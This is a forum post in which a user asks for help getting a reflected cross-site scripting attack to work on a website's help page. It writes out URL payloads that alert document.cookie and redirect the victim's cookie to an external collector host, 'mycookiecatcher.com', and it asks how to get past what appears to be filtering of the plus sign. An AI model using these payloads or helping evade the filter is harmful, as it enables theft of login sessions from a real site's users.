Posts posted by Stiofan

  1. Hi All,

    I have a problem with a site that seems vulnerable to XSS!

    [tt]http://www.site.com/help/topic.php?&topic_name=<script>alert(document.cookie)</script>[/tt]

    The above will display the details of the login cookie.  However, I can’t get the following to work:

    This however:

    [tt]http://www.site.com/help/topic.php?&topic_name=<script>document.location="http://www.mycookiecatcher.com?c="+document.cookie</script>[/tt]

    Won't work!

    I’ve tried converting it to HEX etc.  Nothing seems to work.  Am I doing something wrong, or are there security features in modern browsers that prevent this?

    When I view the HTML source however, I notice something interesting:

    [tt]<script>document.location="http://www.mycookiecatcher.com/c.php?c=" document.cookie</script>[/tt]

    It would appear to have filtered out the plus (+) symbol? When I type the URL:

    [tt] www.site.com/help/topic.php?&topic_name=<script>document.location="www.mycookiecatcher.com?c="+document.cookie</script> [/tt]

    into my browser and hit go, I get a JavaScript error.  It says that it expected a semicolon.

    I would imagine this relates to the plus symbol being filtered? I have tried to convert to HEX but I get the same problem.  Is there anything else I can do?

    Thanks,

    S.
